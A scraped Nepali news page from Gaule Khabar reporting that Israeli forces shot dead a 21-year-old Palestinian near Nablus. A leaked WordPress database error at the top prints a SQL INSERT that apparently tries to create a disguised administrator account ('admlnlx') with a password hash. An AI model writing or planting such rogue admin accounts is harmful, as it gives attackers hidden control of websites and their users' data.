WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVlBk3c.k9XON6QMC8du4xWF2Rt.7B1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 17:01:51', '', 'admlnlx', 'admlnlx')

वेस्ट बैंकमा इजरायली सेनाद्वारा प्यालेस्टिनी मारिए – Gaule Khabar

वेस्ट बैंकमा इजरायली सेनाद्वारा प्यालेस्टिनी मारिए

वेस्ट बैंकमा इजरायली सेनाद्वारा प्यालेस्टिनी मारिए

 

काठमाण्डौ । वेस्ट बैंक उत्तरी भागको एक स्थानमा इजरायली सेनाले बिहीबार बिहान एक प्यालेस्टिनी व्यक्तिको हत्या गरेको प्यालेस्टिनी चिकित्सा र सुरक्षा स्रोतहरुले जनाएको छ ।

इजरायली सेनाले पक्राउ गर्न नाब्लस सहरको पूर्वमा रहेको क्षेत्रमा प्रवेश गरेपछि २१ वर्षीय बाकिर हशसको टाउकोमा गोली लागेको स्रोतले एएफपीलाई बताएको छ । यद्यपी यस समाचारको विस्तृत विवरण भने प्राप्त भएको छैन् । रासस

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका